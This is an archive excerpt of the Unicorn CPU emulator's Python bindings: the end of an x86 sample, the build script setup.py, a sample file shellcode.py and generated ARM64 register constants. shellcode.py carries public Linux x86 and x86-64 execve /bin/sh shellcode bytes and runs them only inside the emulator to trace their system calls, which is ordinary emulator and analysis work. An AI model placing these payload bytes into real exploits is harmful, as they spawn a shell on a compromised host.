print(f">>> Write value {hex(value)} to IO memory at offset {hex(offset)} with {hex(size)} bytes") def test_i386_mmio(): print("Test i386 IO memory") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 8KB memory for this emulation and write the code mu.mem_map(0x10000, 0x8000) mu.mem_write(0x10000, X86_MMIO_CODE) # map the IO memory mu.mmio_map(0x20000, 0x4000, mmio_read_cb, None, mmio_write_cb, None) # prepare registers. mu.reg_write(UC_X86_REG_ECX, 0xdeadbeef) # emulate machine code in infinite time mu.emu_start(0x10000, 0x10000 + len(X86_MMIO_CODE)) # now print out some registers print(f">>> Emulation done. ECX={hex(mu.reg_read(UC_X86_REG_ECX))}") except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_x86_16() test_i386() print("=" * 35) test_i386_map_ptr() print("=" * 35) test_i386_inout() print("=" * 35) test_i386_context_save() print("=" * 35) test_i386_jump() print("=" * 35) test_i386_loop() print("=" * 35) test_i386_invalid_mem_read() print("=" * 35) test_i386_invalid_mem_write() print("=" * 35) test_i386_jump_invalid() test_x86_64() print("=" * 35) test_x86_64_syscall() print("=" * 35) test_i386_mmio() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/setup.cfg�������������������������������������������������������������0000664�0000000�0000000�00000000032�14675241067�0020136�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[bdist_wheel] universal=1 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/setup.py��������������������������������������������������������������0000775�0000000�0000000�00000022253�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com> from __future__ import print_function import glob import logging import os import subprocess import shutil import sys import platform import setuptools from setuptools import setup from sysconfig import get_platform from setuptools.command.build import build from setuptools.command.sdist import sdist from setuptools.command.bdist_egg import bdist_egg log = logging.getLogger(__name__) SYSTEM = sys.platform # sys.maxint is 2**31 - 1 on both 32 and 64 bit mingw IS_64BITS = platform.architecture()[0] == '64bit' # are we building from the repository or from a source distribution? ROOT_DIR = os.path.dirname(os.path.realpath(__file__)) LIBS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'lib') HEADERS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'include') SRC_DIR = os.path.join(ROOT_DIR, 'src') UC_DIR = SRC_DIR if os.path.exists(SRC_DIR) else os.path.join(ROOT_DIR, '../..') BUILD_DIR = os.path.join(UC_DIR, 'build_python') VERSION = "2.1.1" if SYSTEM == 'darwin': LIBRARY_FILE = "libunicorn.2.dylib" STATIC_LIBRARY_FILE = "libunicorn.a" elif SYSTEM in ('win32', 'cygwin'): LIBRARY_FILE = "unicorn.dll" STATIC_LIBRARY_FILE = "unicorn.lib" else: LIBRARY_FILE = "libunicorn.so.2" STATIC_LIBRARY_FILE = "libunicorn.a" def clean_bins(): shutil.rmtree(LIBS_DIR, ignore_errors=True) shutil.rmtree(HEADERS_DIR, ignore_errors=True) def copy_sources(): """Copy the C sources into the source directory. This rearranges the source files under the python distribution directory. """ src = [] shutil.rmtree(SRC_DIR, ignore_errors=True) os.mkdir(SRC_DIR) shutil.copytree(os.path.join(ROOT_DIR, '../../qemu'), os.path.join(SRC_DIR, 'qemu/')) shutil.copytree(os.path.join(ROOT_DIR, '../../msvc'), os.path.join(SRC_DIR, 'msvc/')) shutil.copytree(os.path.join(ROOT_DIR, '../../include'), os.path.join(SRC_DIR, 'include/')) # make -> configure -> clean -> clean tests fails unless tests is present shutil.copytree(os.path.join(ROOT_DIR, '../../tests'), os.path.join(SRC_DIR, 'tests/')) shutil.copytree(os.path.join(ROOT_DIR, '../../samples'), os.path.join(SRC_DIR, 'samples/')) shutil.copytree(os.path.join(ROOT_DIR, '../../glib_compat'), os.path.join(SRC_DIR, 'glib_compat/')) try: # remove site-specific configuration file # might not exist os.remove(os.path.join(SRC_DIR, 'qemu/config-host.mak')) except OSError: pass src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.[ch]"))) src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.mk"))) src.extend(glob.glob(os.path.join(ROOT_DIR, "../../cmake/*.cmake"))) src.extend(glob.glob(os.path.join(ROOT_DIR, "../../LICENSE*"))) src.extend(glob.glob(os.path.join(ROOT_DIR, "../../README.md"))) src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.TXT"))) src.extend(glob.glob(os.path.join(ROOT_DIR, "../../CMakeLists.txt"))) for filename in src: outpath = os.path.join(SRC_DIR, os.path.basename(filename)) log.info("%s -> %s" % (filename, outpath)) shutil.copy(filename, outpath) def build_libraries(): """ Prepare the unicorn directory for a binary distribution or installation. Builds shared libraries and copies header files. Will use a src/ dir if one exists in the current directory, otherwise assumes it's in the repo """ cwd = os.getcwd() clean_bins() os.mkdir(HEADERS_DIR) os.mkdir(LIBS_DIR) # copy public headers shutil.copytree(os.path.join(UC_DIR, 'include', 'unicorn'), os.path.join(HEADERS_DIR, 'unicorn')) # check if a prebuilt library exists # if so, use it instead of building if os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE)): shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE), LIBS_DIR) if STATIC_LIBRARY_FILE is not None and os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE)): shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE), LIBS_DIR) return # otherwise, build!! os.chdir(UC_DIR) try: subprocess.check_call(['msbuild', '/help']) except: has_msbuild = False else: has_msbuild = True if has_msbuild and SYSTEM == 'win32': plat = 'Win32' if platform.architecture()[0] == '32bit' else 'x64' conf = 'Debug' if os.getenv('DEBUG', '') else 'Release' if not os.path.exists(BUILD_DIR): os.mkdir(BUILD_DIR) subprocess.check_call(['cmake', '-B', BUILD_DIR, '-G', "Visual Studio 16 2019", "-A", plat, "-DCMAKE_BUILD_TYPE=" + conf]) subprocess.check_call(['msbuild', 'unicorn.sln', '-m', '-p:Platform=' + plat, '-p:Configuration=' + conf], cwd=BUILD_DIR) obj_dir = os.path.join(BUILD_DIR, conf) shutil.copy(os.path.join(obj_dir, LIBRARY_FILE), LIBS_DIR) shutil.copy(os.path.join(BUILD_DIR, STATIC_LIBRARY_FILE), LIBS_DIR) else: # platform description refs at https://docs.python.org/2/library/sys.html#sys.platform if not os.path.exists(BUILD_DIR): os.mkdir(BUILD_DIR) conf = 'Debug' if os.getenv('DEBUG', '') else 'Release' cmake_args = ["cmake", '-B', BUILD_DIR, '-S', UC_DIR, "-DCMAKE_BUILD_TYPE=" + conf] if os.getenv("TRACE", ""): cmake_args += ["-DUNICORN_TRACER=on"] subprocess.check_call(cmake_args) os.chdir(BUILD_DIR) threads = os.getenv("THREADS", "4") subprocess.check_call(["cmake", "--build", ".", "-j" + threads]) shutil.copy(LIBRARY_FILE, LIBS_DIR) shutil.copy(STATIC_LIBRARY_FILE, LIBS_DIR) os.chdir(cwd) class custom_sdist(sdist): def run(self): clean_bins() copy_sources() return sdist.run(self) class custom_build(build): def run(self): if 'LIBUNICORN_PATH' in os.environ: log.info("Skipping building C extensions since LIBUNICORN_PATH is set") else: log.info("Building C extensions") build_libraries() return build.run(self) class custom_bdist_egg(bdist_egg): def run(self): self.run_command('build') return bdist_egg.run(self) def dummy_src(): return [] cmdclass = {} cmdclass['build'] = custom_build cmdclass['sdist'] = custom_sdist cmdclass['bdist_egg'] = custom_bdist_egg if 'bdist_wheel' in sys.argv and '--plat-name' not in sys.argv: idx = sys.argv.index('bdist_wheel') + 1 sys.argv.insert(idx, '--plat-name') name = get_platform() if 'linux' in name: # linux_* platform tags are disallowed because the python ecosystem is fubar # linux builds should be built in the centos 5 vm for maximum compatibility # see https://github.com/pypa/manylinux # see also https://github.com/angr/angr-dev/blob/master/bdist.sh sys.argv.insert(idx + 1, 'manylinux1_' + platform.machine()) elif 'mingw' in name: if IS_64BITS: sys.argv.insert(idx + 1, 'win_amd64') else: sys.argv.insert(idx + 1, 'win32') else: # https://www.python.org/dev/peps/pep-0425/ sys.argv.insert(idx + 1, name.replace('.', '_').replace('-', '_')) try: from setuptools.command.develop import develop class custom_develop(develop): def run(self): log.info("Building C extensions") build_libraries() return develop.run(self) cmdclass['develop'] = custom_develop except ImportError: print("Proper 'develop' support unavailable.") def join_all(src, files): return tuple(os.path.join(src, f) for f in files) long_desc = ''' Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework based on [QEMU](http://qemu.org). Unicorn offers some unparalleled features: - Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, PowerPC, RISCV, SPARC, S390X, TriCore and X86 (16, 32, 64-bit) - Clean/simple/lightweight/intuitive architecture-neutral API - Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, and Lua. - Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed) - High performance via Just-In-Time compilation - Support for fine-grained instrumentation at various levels - Thread-safety by design - Distributed under free software license GPLv2 Further information is available at http://www.unicorn-engine.org ''' setup( provides=['unicorn'], packages=setuptools.find_packages(include=["unicorn", "unicorn.*"]), name='unicorn', version=VERSION, author='Nguyen Anh Quynh', author_email='aquynh@gmail.com', description='Unicorn CPU emulator engine', long_description=long_desc, long_description_content_type="text/markdown", url='http://www.unicorn-engine.org', classifiers=[ 'License :: OSI Approved :: BSD License', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', ], requires=['ctypes'], cmdclass=cmdclass, zip_safe=False, include_package_data=True, is_pure=False, package_data={ 'unicorn': ['unicorn/py.typed', 'lib/*', 'include/unicorn/*'] } ) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/shellcode.py����������������������������������������������������������0000775�0000000�0000000�00000014510�14675241067�0020642�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for X86 of Unicorn. # Nguyen Anh Quynh <aquynh@gmail.com> # KaiJern Lau <kj@theshepherdlab.io> from __future__ import print_function from unicorn import * from unicorn.x86_const import * # Original shellcode from this example. #X86_CODE32 = b"\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f" # Linux/x86 execve /bin/sh shellcode 23 bytes, from http://shell-storm.org/shellcode/files/shellcode-827.php # 0: 31 c0 xor eax,eax # 2: 50 push eax # 3: 68 2f 2f 73 68 push 0x68732f2f # 8: 68 2f 62 69 6e push 0x6e69622f # d: 89 e3 mov ebx,esp # f: 50 push eax # 10: 53 push ebx # 11: 89 e1 mov ecx,esp # 13: b0 0b mov al,0xb # 15: cd 80 int 0x80 X86_CODE32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" X86_CODE32_SELF = b"\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41" # Linux/x86 64bit execve /bin/sh shellcode # 0: 48 31 ff xor rdi,rdi # 3: 57 push rdi # 4: 57 push rdi # 5: 5e pop rsi # 6: 5a pop rdx # 7: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f # e: 2f 73 68 # 11: 48 c1 ef 08 shr rdi,0x8 # 15: 57 push rdi # 16: 54 push rsp # 17: 5f pop rdi # 18: 6a 3b push 0x3b # 1a: 58 pop rax # 1b: 0f 05 syscall X86_CODE64 = b"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" # memory address where emulation starts ADDRESS = 0x1000000 # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # read this instruction code from memory tmp = uc.mem_read(address, size) print("*** PC = %x *** :" %(address), end="") for i in tmp: print(" %02x" %i, end="") print("") # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) def read_string(uc, address): ret = "" c = uc.mem_read(address, 1)[0] read_bytes = 1 while c != 0x0: ret += chr(c) c = uc.mem_read(address + read_bytes, 1)[0] read_bytes += 1 return ret # callback for tracing Linux interrupt def hook_intr(uc, intno, user_data): # only handle Linux syscall if intno != 0x80: print("got interrupt %x ???" %intno) uc.emu_stop() return eax = uc.reg_read(UC_X86_REG_EAX) eip = uc.reg_read(UC_X86_REG_EIP) if eax == 1: # sys_exit print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax)) uc.emu_stop() elif eax == 4: # sys_write # ECX = buffer address ecx = uc.reg_read(UC_X86_REG_ECX) # EDX = buffer size edx = uc.reg_read(UC_X86_REG_EDX) try: buf = uc.mem_read(ecx, edx) print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = " \ %(eip, intno, ecx, edx), end="") for i in buf: print("%c" %i, end="") print("") except UcError as e: print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = <unknown>\n" \ %(eip, intno, ecx, edx)) elif eax == 11: # sys_write ebx = uc.reg_read(UC_X86_REG_EBX) filename = read_string(uc, ebx) print(">>> SYS_EXECV filename=%s" % filename) else: print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax)) def hook_syscall32(mu, user_data): eax = mu.reg_read(UC_X86_REG_EAX) print(">>> got SYSCALL with EAX = 0x%x" %(eax)) mu.emu_stop() def hook_syscall64(mu, user_data): rax = mu.reg_read(UC_X86_REG_RAX) rdi = mu.reg_read(UC_X86_REG_RDI) print(">>> got SYSCALL with RAX = %d" %(rax)) if rax == 59: #sys_execve filename = read_string(mu, rdi) print(">>> SYS_EXECV filename=%s" % filename) else: rip = mu.reg_read(UC_X86_REG_RIP) print(">>> Syscall Found at 0x%x: , RAX = 0x%x" %(rip, rax)) mu.emu_stop() # Test X86 32 bit def test_i386(mode, code): if mode == UC_MODE_32: print("Emulate x86_32 code") elif mode == UC_MODE_64: print("Emulate x86_64 code") try: # Initialize emulator mu = Uc(UC_ARCH_X86, mode) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, code) # initialize stack mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) if mode == UC_MODE_32: # handle interrupt ourself mu.hook_add(UC_HOOK_INTR, hook_intr) # handle SYSCALL mu.hook_add(UC_HOOK_INSN, hook_syscall32, None, 1, 0, UC_X86_INS_SYSCALL) elif mode == UC_MODE_64: mu.hook_add(UC_HOOK_INSN, hook_syscall64, None, 1, 0, UC_X86_INS_SYSCALL) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(code)) # now print out some registers print(">>> Emulation done") except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_i386(UC_MODE_32, X86_CODE32_SELF) print("=" * 20) test_i386(UC_MODE_32, X86_CODE32) print("=" * 20) test_i386(UC_MODE_64, X86_CODE64)����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/��������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017777�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/__init__.py���������������������������������������������������0000664�0000000�0000000�00000000455�14675241067�0022114�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Forwarding defs for compatibility from . import arm_const, arm64_const, mips_const, sparc_const, m68k_const, x86_const, riscv_const, s390x_const, tricore_const from .unicorn_const import * from .unicorn import Uc, ucsubclass, uc_version, uc_arch_supported, version_bind, debug, UcError, __version__ �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/arm64_const.py������������������������������������������������0000664�0000000�0000000�00000016564�14675241067�0022524�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.py] # ARM64 CPU UC_CPU_ARM64_A57 = 0 UC_CPU_ARM64_A53 = 1 UC_CPU_ARM64_A72 = 2 UC_CPU_ARM64_MAX = 3 UC_CPU_ARM64_ENDING = 4 # ARM64 registers UC_ARM64_REG_INVALID = 0 UC_ARM64_REG_X29 = 1 UC_ARM64_REG_X30 = 2 UC_ARM64_REG_NZCV = 3 UC_ARM64_REG_SP = 4 UC_ARM64_REG_WSP = 5 UC_ARM64_REG_WZR = 6 UC_ARM64_REG_XZR = 7 UC_ARM64_REG_B0 = 8 UC_ARM64_REG_B1 = 9 UC_ARM64_REG_B2 = 10 UC_ARM64_REG_B3 = 11 UC_ARM64_REG_B4 = 12 UC_ARM64_REG_B5 = 13 UC_ARM64_REG_B6 = 14 UC_ARM64_REG_B7 = 15 UC_ARM64_REG_B8 = 16 UC_ARM64_REG_B9 = 17 UC_ARM64_REG_B10 = 18 UC_ARM64_REG_B11 = 19 UC_ARM64_REG_B12 = 20 UC_ARM64_REG_B13 = 21 UC_ARM64_REG_B14 = 22 UC_ARM64_REG_B15 = 23 UC_ARM64_REG_B16 = 24 UC_ARM64_REG_B17 = 25 UC_ARM64_REG_B18 = 26 UC_ARM64_REG_B19 = 27 UC_ARM64_REG_B20 = 28 UC_ARM64_REG_B21 = 29 UC_ARM64_REG_B22 = 30 UC_ARM64_REG_B23 = 31 UC_ARM64_REG_B24 = 32 UC_ARM64_REG_B25 = 33 UC_ARM64_REG_B26 = 34 UC_ARM64_REG_B27 = 35 UC_ARM64_REG_B28 = 36 UC_ARM64_REG_B29 = 37 UC_ARM64_REG_B30 = 38 UC_ARM64_REG_B31 = 39 UC_ARM64_REG_D0 = 40 UC_ARM64_REG_D1 = 41 UC_ARM64_REG_D2 = 42 UC_ARM64_REG_D3 = 43 UC_ARM64_REG_D4 = 44 UC_ARM64_REG_D5 = 45 UC_ARM64_REG_D6 = 46 UC_ARM64_REG_D7 = 47 UC_ARM64_REG_D8 = 48 UC_ARM64_REG_D9 = 49 UC_ARM64_REG_D10 = 50 UC_ARM64_REG_D11 = 51 UC_ARM64_REG_D12 = 52 UC_ARM64_REG_D13 = 53 UC_ARM64_REG_D14 = 54 UC_ARM64_REG_D15 = 55 UC_ARM64_REG_D16 = 56 UC_ARM64_REG_D17 = 57 UC_ARM64_REG_D18 = 58 UC_ARM64_REG_D19 = 59 UC_ARM64_REG_D20 = 60 UC_ARM64_REG_D21 = 61 UC_ARM64_REG_D22 = 62 UC_ARM64_REG_D23 = 63 UC_ARM64_REG_D24 = 64 UC_ARM64_REG_D25 = 65 UC_ARM64_REG_D26 = 66 UC_ARM64_REG_D27 = 67 UC_ARM64_REG_D28 = 68 UC_ARM64_REG_D29 = 69 UC_ARM64_REG_D30 = 70 UC_ARM64_REG_D31 = 71 UC_ARM64_REG_H0 = 72 UC_ARM64_REG_H1 = 73 UC_ARM64_REG_H2 = 74 UC_ARM64_REG_H3 = 75 UC_ARM64_REG_H4 = 76 UC_ARM64_REG_H5 = 77 UC_ARM64_REG_H6 = 78 UC_ARM64_REG_H7 = 79 UC_ARM64_REG_H8 = 80 UC_ARM64_REG_H9 = 81 UC_ARM64_REG_H10 = 82 UC_ARM64_REG_H11 = 83 UC_ARM64_REG_H12 = 84 UC_ARM64_REG_H13 = 85 UC_ARM64_REG_H14 = 86 UC_ARM64_REG_H15 = 87 UC_ARM64_REG_H16 = 88 UC_ARM64_REG_H17 = 89 UC_ARM64_REG_H18 = 90 UC_ARM64_REG_H19 = 91 UC_ARM64_REG_H20 = 92 UC_ARM64_REG_H21 = 93 UC_ARM64_REG_H22 = 94 UC_ARM64_REG_H23 = 95 UC_ARM64_REG_H24 = 96 UC_ARM64_REG_H25 = 97 UC_ARM64_REG_H26 = 98 UC_ARM64_REG_H27 = 99 UC_ARM64_REG_H28 = 100 UC_ARM64_REG_H29 = 101 UC_ARM64_REG_H30 = 102 UC_ARM64_REG_H31 = 103 UC_ARM64_REG_Q0 = 104 UC_ARM64_REG_Q1 = 105 UC_ARM64_REG_Q2 = 106 UC_ARM64_REG_Q3 = 107 UC_ARM64_REG_Q4 = 108 UC_ARM64_REG_Q5 = 109 UC_ARM64_REG_Q6 = 110 UC_ARM64_REG_Q7 = 111 UC_ARM64_REG_Q8 = 112 UC_ARM64_REG_Q9 = 113 UC_ARM64_REG_Q10 = 114 UC_ARM64_REG_Q11 = 115 UC_ARM64_REG_Q12 = 116 UC_ARM64_REG_Q13 = 117 UC_ARM64_REG_Q14 = 118 UC_ARM64_REG_Q15 = 119 UC_ARM64_REG_Q16 = 120 UC_ARM64_REG_Q17 = 121 UC_ARM64_REG_Q18 = 122 UC_ARM64_REG_Q19 = 123 UC_ARM64_REG_Q20 = 124 UC_ARM64_REG_Q21 = 125 UC_ARM64_REG_Q22 = 126 UC_ARM64_REG_Q23 = 127 UC_ARM64_REG_Q24 = 128 UC_ARM64_REG_Q25 = 129 UC_ARM64_REG_Q26 = 130 UC_ARM64_REG_Q27 = 131 UC_ARM64_REG_Q28 = 132 UC_ARM64_REG_Q29 = 133 UC_ARM64_REG_Q30 = 134 UC_ARM64_REG_Q31 = 135 UC_ARM64_REG_S0 = 136 UC_ARM64_REG_S1 = 137 UC_ARM64_REG_S2 = 138 UC_ARM64_REG_S3 = 139 UC_ARM64_REG_S4 = 140 UC_ARM64_REG_S5 = 141 UC_ARM64_REG_S6 = 142 UC_ARM64_REG_S7 = 143 UC_ARM64_REG_S8 = 144 UC_ARM64_REG_S9 = 145 UC_ARM64_REG_S10 = 146 UC_ARM64_REG_S11 = 147 UC_ARM64_REG_S12 = 148 UC_ARM64_REG_S13 = 149 UC_ARM64_REG_S14 = 150 UC_ARM64_REG_S15 = 151 UC_ARM64_REG_S16 = 152 UC_ARM64_REG_S17 = 153 UC_ARM64_REG_S18 = 154 UC_ARM64_REG_S19 = 155 UC_ARM64_REG_S20 = 156 UC_ARM64_REG_S21 = 157 UC_ARM64_REG_S22 = 158 UC_ARM64_REG_S23 = 159 UC_ARM64_REG_S24 = 160 UC_ARM64_REG_S25 = 161 UC_ARM64_REG_S26 = 162 UC_ARM64_REG_S27 = 163 UC_ARM64_REG_S28 = 164 UC_ARM64_REG_S29 = 165 UC_ARM64_REG_S30 = 166 UC_ARM64_REG_S31 = 167 UC_ARM64_REG_W0 = 168 UC_ARM64_REG_W1 = 169 UC_ARM64_REG_W2 = 170 UC_ARM64_REG_W3 = 171 UC_ARM64_REG_W4 = 172 UC_ARM64_REG_W5 = 173 UC_ARM64_REG_W6 = 174 UC_ARM64_REG_W7 = 175 UC_ARM64_REG_W8 = 176 UC_ARM64_REG_W9 = 177 UC_ARM64_REG_W10 = 178 UC_ARM64_REG_W11 = 179 UC_ARM64_REG_W12 = 180 UC_ARM64_REG_W13 = 181 UC_ARM64_REG_W14 = 182 UC_ARM64_REG_W15 = 183 UC_ARM64_REG_W16 = 184 UC_ARM64_REG_W17 = 185 UC_ARM64_REG_W18 = 186 UC_ARM64_REG_W19 = 187 UC_ARM64_REG_W20 = 188 UC_ARM64_REG_W21 = 189 UC_ARM64_REG_W22 = 190 UC_ARM64_REG_W23 = 191 UC_ARM64_REG_W24 = 192 UC_ARM64_REG_W25 = 193 UC_ARM64_REG_W26 = 194 UC_ARM64_REG_W27 = 195 UC_ARM64_REG_W28 = 196 UC_ARM64_REG_W29 = 197 UC_ARM64_REG_W30 = 198 UC_ARM64_REG_X0 = 199 UC_ARM64_REG_X1 = 200 UC_ARM64_REG_X2 = 201 UC_ARM64_REG_X3 = 202 UC_ARM64_REG_X4 = 203 UC_ARM64_REG_X5 = 204 UC_ARM64_REG_X6 = 205 UC_ARM64_REG_X7 = 206 UC_ARM64_REG_X8 = 207 UC_ARM64_REG_X9 = 208 UC_ARM64_REG_X10 = 209 UC_ARM64_REG_X11 = 210 UC_ARM64_REG_X12 = 211 UC_ARM64_REG_X13 = 212 UC_ARM64_REG_X14 = 213 UC_ARM64_REG_X15 = 214 UC_ARM64_REG_X16 = 215 UC_ARM64_REG_X17 = 216 UC_ARM64_REG_X18 = 217 UC_ARM64_REG_X19 = 218 UC_ARM64_REG_X20 = 219 UC_ARM64_REG_X21 = 220 UC_ARM64_REG_X22 = 221 UC_ARM64_REG_X23 = 222 UC_ARM64_REG_X24 = 223 UC_ARM64_REG_X25 = 224 UC_ARM64_REG_X26 = 225 UC_ARM64_REG_X27 = 226 UC_ARM64_REG_X28 = 227 UC_ARM64_REG_V0 = 228 UC_ARM64_REG_V1 = 229 UC_ARM64_REG_V2 = 230 UC_ARM64_REG_V3 = 231 UC_ARM64_REG_V4 = 232 UC_ARM64_REG_V5 = 233 UC_ARM64_REG_V6 = 234 UC_ARM64_REG_V7 = 235 UC_ARM64_REG_V8 = 236 UC_ARM64_REG_V9 = 237 UC_ARM64_REG_V10 = 238 UC_ARM64_REG_V11 = 239 UC_ARM64_REG_V12 = 240 UC_ARM64_REG_V13 = 241 UC_ARM64_REG_V14 = 242 UC_ARM64_REG_V15 = 243 UC_ARM64_REG_V16 = 244 UC_ARM64_REG_V17 = 245 UC_ARM64_REG_V18 = 246 UC_ARM64_REG_V19 = 247 UC_ARM64_REG_V20 = 248 UC_ARM64_REG_V21 = 249 UC_ARM64_REG_V22 = 250 UC_ARM64_REG_V23 = 251 UC_ARM64_REG_V24 = 252 UC_ARM64_REG_V25 = 253 UC_ARM64_REG_V26 = 254 UC_ARM64_REG_V27 = 255 UC_ARM64_REG_V28 = 256 UC_ARM64_REG_V29 = 257 UC_ARM64_REG_V30 = 258 UC_ARM64_REG_V31 = 259 # pseudo registers UC_ARM64_REG_PC = 260 UC_ARM64_REG_CPACR_EL1 = 261 # thread registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TPIDR_EL0 = 262 UC_ARM64_REG_TPIDRRO_EL0 = 263 UC_ARM64_REG_TPIDR_EL1 = 264 UC_ARM64_REG_PSTATE = 265 # exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_ELR_EL0 = 266 UC_ARM64_REG_ELR_EL1 = 267 UC_ARM64_REG_ELR_EL2 = 268 UC_ARM64_REG_ELR_EL3 = 269 # stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_SP_EL0 = 270 UC_ARM64_REG_SP_EL1 = 271 UC_ARM64_REG_SP_EL2 = 272 UC_ARM64_REG_SP_EL3 = 273 # other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TTBR0_EL1 = 274 UC_ARM64_REG_TTBR1_EL1 = 275 UC_ARM64_REG_ESR_EL0 = 276 UC_ARM64_REG_ESR_EL1 = 277 UC_ARM64_REG_ESR_EL2 = 278 UC_ARM64_REG_ESR_EL3 = 279 UC_ARM64_REG_FAR_EL0 = 280 UC_ARM64_REG_FAR_EL1 = 281 UC_ARM64_REG_FAR_EL2 = 282 UC_ARM64_REG_FAR_EL3 = 283 UC_ARM64_REG_PAR_EL1 = 284 UC_ARM64_REG_MAIR_EL1 = 285 UC_ARM64_REG_VBAR_EL0 = 286 UC_ARM64_REG_VBAR_EL1 = 287 UC_ARM64_REG_VBAR_EL2 = 288 UC_ARM64_REG_VBAR_EL3 = 289 UC_ARM64_REG_CP_REG = 290 # floating point control and status registers UC_ARM64_REG_FPCR = 291 UC_ARM64_REG_FPSR = 292 UC_ARM64_REG_ENDING = 293 # alias registers UC_ARM64_REG_IP0 = 215 UC_ARM64_REG_IP1 = 216 UC_ARM64_REG_FP = 1 UC_ARM64_REG_LR = 2 # ARM64 instructions UC_ARM64_INS_INVALID = 0 UC_ARM64_INS_MRS = 1 UC_ARM64_INS_MSR = 2 UC_ARM64_INS_SYS = 3 UC_ARM64_INS_SYSL = 4 UC_ARM64_INS_ENDING = 5 